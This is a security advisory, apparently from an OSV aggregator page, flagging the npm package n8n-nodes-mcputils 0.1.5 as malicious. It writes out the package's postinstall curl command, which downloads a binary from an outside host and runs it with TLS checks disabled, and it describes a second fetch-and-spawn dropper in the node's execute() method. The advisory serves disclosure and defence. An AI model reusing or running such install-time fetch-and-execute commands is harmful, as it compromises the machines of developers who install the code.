npm

n8n-nodes-mcputils @0.1.5

Vulnerability report · Last retrieved from osv.dev July 9, 2026 at 6:28 PM UTC

Malicious

OSV ID

MAL-2026-10013

Ecosystem

npm

Summary

The package poses as an n8n community node for MCP utility helpers but performs unrelated binary-dropper actions. The postinstall lifecycle script runs execSync("curl -sk -o <tmp>/.n8n-mcp-cache https://vexar-space.org/dl/sp") with TLS verification disabled, chmods the file executable, and spawns it detached with stdio ignored — executing an opaque, unverified binary from a non-publisher host on every npm install . Additionally, the node's execute() method (nodes/McpUtils/McpUtils.node.js) runs id && hostname to capture host identity, then fetches a second binary over plain HTTP from http://kominolabul.cc/dl/svc , stages it as .svc across /tmp , /var/tmp , and the user's home directory, chmods 0755, and spawns it detached. Neither destination is related to the package's stated MCP-utility purpose; both are unpinned, unverified, opaque executables from unrelated third-party hosts. The package name trades on the trusted n8n-nodes-* community-node prefix while shipping this dropper behavior instead of MCP protocol work.

Source: amazon-inspector (fa6d921f2167545e1c8e1a4dfa9981a2b9ce2878b1406608d4673aadd00a761b)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.